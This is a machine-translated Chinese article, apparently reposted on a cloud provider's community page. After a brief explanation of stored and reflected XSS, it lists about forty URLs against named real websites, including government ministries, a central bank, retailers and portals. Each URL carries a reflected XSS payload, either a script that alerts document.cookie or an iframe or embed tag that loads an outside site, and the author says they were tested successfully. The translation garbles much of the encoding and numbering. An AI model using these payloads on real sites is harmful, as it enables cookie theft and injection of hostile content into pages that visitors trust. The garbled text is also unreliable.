Typical XSS cross-site scripting attack security detection report

Source: Internet
Author: User

Note: The following connections are successfully tested in the browser.

For a webpage, XSS inserts content into the webpage without authorization.

Is a vulnerability.

However, you are more concerned about inserting content instead of authorization. This content is often harmful.

The harm is more to other netizens accessing this page. The code you inserted is run on me.

Now there are many things. "Running here" means that the Code has an environment, so XSS must be based on the environment. What is the situation?

In the case of XSS, this is the most critical.

Generally, XSS is divided into persistence and non-persistence. Both of them open a link and then automatically run the code (malicious

Parameters created), the persistent type is the database where the code is stored on the server, like the user name of a website, self-introduced

Shao, password, etc. If not filtered, there will be XSS. When I access your page, because your name is a piece of code

I have endured this code and the potential losses of this Code. A non-persistent type is a link, a chain

There is a parameter in it, which is a piece of code. After I click it, the browser opens this link and the link points to the program to execute this generation.

Code parameter, and then return to me the running result. The execution is actually triggered by providing code parameters to the program, which is real-time.

 

First: mingwan B2B
Http://search. B2B .cn/product? K = % 3 cscript % 3 ealert (% 27RC % 27) % 3c % 2 fscript % 3e


Second: phoenixnet
Http://my.ifeng.com /? C = friends & a = visit & ftype = 6 & friendName = % 3C/title % 3E % 3 Cscript % 3 Ealert ('
RC ') % 3C/script % 3E


Third: China Electronic Network

Http://search.21ic.com/so.php? Keyword = % 3 Cscript % 3 Ealert % 28document. cookie % 29%
3C % 2 Fscript % 3E


Fourth: China Energy Network

Http://www.power-cn.cn/sample/search.asp? Txtitle = <script> alert (document. cookie) </scr
Ipt>


Fifth: 21CN
Http://tags.21cn.com/tagsSearch? Tags = % 3 Cscript % 3 Ealert () % 3C/script % 3E


Sixth: chinnet

Http://mall.cnki.net/magazine/articlesearch.aspx? Keys = % 3 Ciframe % 20src = 'HTTP: // www.chinaxiaoe.com '% 3E % 3C/iframe % 3E


Seventh: Computer World

Http://www.ccw.com.cn/search/search_article.php? Keyword = % 3C % 2 Fspan % 3E % 3 Cifra
Me + src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E % 3C % 2 hour rame % 3E


Eighth: Suning Tesco

Http://www.suning.com/emall/Search? SearchKeywords = % 3 Cembed % 20SRC = HTTP: // WWW. CHINAXIAOE. COM % 3E % 3C/EMBED % 3E


Ninth: ANBO education www.2cto.com

Http://www.miiceic.org.cn/plus/search.php? Keyword = % 3 Ciframe + src % 3 Dhttp % 3A % 2F
% 2Fwww.chinaxiaoe.com % 3E % 3 Ciframe % 3E


Tenth: Pat

Net http://sse1.paipai.com/s-kt11l4oxquvw6sgiqyujn3barq3jjsolru4karusi74j48goi311h338
Kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html


11th: source code sky

Http://www.codesky.net/article/search? S = Random_Coder % 3C % 2 Ftitle % 3E % 3 Ciframe +
Src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E % 3C % 2 20.rame % 3E


12th: Catalogue

Http://so.mop.com? Q = % 3C/title % 3E % 3 Cembed % 20src = Http: // www.chinaxiaoe.com % 3E % 3C/em
Bed % 3E


13th: Lili female

Http://search.rayli.com.cn/searchII.html? Lxkw = % 3C/span % 3E % 3 Cembed % 20src = http ://
Www.chinaxiaoe.com % 3E % 3C/embed % 3E


14th: glutinous rice Network

Http://www.nuomi.com/search? K = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 DHttp % 3A % 2F %
2Fwww.chinaxiaoe.com % 3E % 3C % 2 Fembed % 3E


15th: CCN

Http://app.zhcw.com/wwwroot/zhcw/jsp/indexSearch.jsp? Query = Random_Coder % 3C % 2
Ftitle % 3E % 3 Cembed + src % 3 DHttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E & site = 2 & id = 1


18th: Pacific Network

Http://ks.pconline.com.cn/index.jsp? Q = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 Dhttp % 3A %
2F % 2Fwww.chinaxiaoe.com % 3E


19th: pangu search

Http://news.panguso.com/newssearch.htm? OrderType = 1 & q = % 3C % 2 Ftitle % 3E % 3 Cembe
D + src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E


20th: 7K7K games

Http://so.7k7k.com/game/1%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2Fwww.chinaxiaoe.com%3E.htm


21st: mobile search
Http: // 202.85.216.217/query? Qt = % 3C/title % 3E % 3 Cembed % 20src = http://www.chinaxiaoe.com % 3E


22nd: 19 th Floor

Http://www.19lou.com/search/thread? Keyword = % 3C % 2 Ftitle % 3E % 3 Cembed % 20src % 3
Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E


23rd: China Daily

Http://search.chinadaily.com.cn/all_en.jsp? SearchText = % 22% 3E % 3 Cembed + src % 3 Dhttp
% 3A % 2F % 2Fwww.chinaxiaoe.com % 3E


24th: Download

Http://www.verycd.com/search/entries/%3C%2Ftitle%3E%3Cembed%20src%3Dhttp%3
A % 2F % 2Fwww.chinaxiaoe.com % 3E


25th: Tianya community

Http://search.tianya.cn? Q = % 3C % 2 Ftitle % 3E % 3 Cembed % 20src % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E


26th: huajun Software Park

Http://search.newhua.com/search_list.php? Searchname = % 3C % 2 Ftitle % 3E % 3 Cembed %
2F * % 2 Fsrc % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E


28th: Beidou Mobile Network

Http://mobile.139shop.com/brand/0/0_0_0-0-0-0-0-0_%3C/title%3E%3Cembed%20src=
Http://www.chinaxiaoe.com %3e_00%1.htm


29th: appchina

Http://www.appchina.com/market/berry/search.action? Q = % 3 Cembed + src % 3 Dhttp % 3A
% 2F % 2Fwww.chinaxiaoe.com % 3E


30th: youren.com

Http://user.younet.com/search/default.php? Search_phone =\% 22/% 3E % 3 Cembed % 20src
Http://www.chinaxiaoe.com % 3E


31st: wheat bags

Http://search.mbaobao.com/searcher? K = % 3C % 2 Ftitle % 3E % 3 Cembed + src % 3 Dhttp % 3A
% 2F % 2Fwww.chinaxiaoe.com % 3E


32nd: cofco I buy Network

Http://www.womai.com/ProductList.htm? Keywords = % 3C % 2 Ftitle % 3E % 3 Cembed % 2F *
% 2 Fsrc % 3 Dhttp % 3A % 2F % 2Fwww.chinaxiaoe.com % 3E


33rd: Yangguang shopping

Http://www.cnrmall.com/ TV /product/search.jsp? Key = % 22/% 3E % 3 Cembed % 20src = http :/
/Www.chinaxiaoe.com % 3E


34th: Full-seat Network

Http://s.manzuo.com/search? Keyword = % 22% 2F % 3E % 3 Cembed % 20src % 3 Dhttp % 3A %
2F % 2Fwww.chinaxiaoe.com % 3E


35th: youtao ordering Network

Http://www.utao365.com/search.php? Encode = YTo1OntzOjg6ImNhdGVnb3J5IjtzOjE6IjAi
O3M6ODoia2V5d29yZHMiO3M6MzU6IjwvdGl0bGU % 2bPGVtYmVkIHNyYz1odHRwOi8vdG1
4ay5vcmc % duplicate
Signature =
=


36th: Meteorological Administration:
Http://www.cma.gov.cn: 8080/was40/search? Searchword = % 3 Cembed // src = http://www.chinaxiaoe.com % 3E


37th: Ministry of Transportation:
Http://search.moc.gov.cn: 8080/was40/search? Searchword = % 3 Cembed // src = http://www.chinaxiaoe.com % 3E
38th: Ministry of Culture:
Http://app.mcprc.gov.cn: 9000/was40/search? Channelid = 56599 & searchword = % 3 Ciframe
% 20src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E


39th: People's Bank of China:
Http://www.pbc.gov.cn: 8080/dig/Default. jsp? Q = % 22/% 3E % 3 Ciframe % 20src = http://www.chinaxiaoe.com % 3E/iframe % 3E


40th: China Telecom
Http://search.chinatelecom.com.cn/was40/search? Searchword = % 3 Ciframe // src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E


41st: Communist Youth League of China
Http://www.gqt.org.cn/was40/search? Channelid = 17472 & searchword = % 3 Ciframe // src = ht
Tp: // www.chinaxiaoe.com % 3E % 3C/iframe % 3E


42nd: Central compilation Board
Http://search.cctb.net: 8081/utf8/search. jsp? Channelid = 76134 & searchword = % 3 Ciframe //
Src = http://www.chinaxiaoe.com % 3E % 3C/iframe % 3E

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.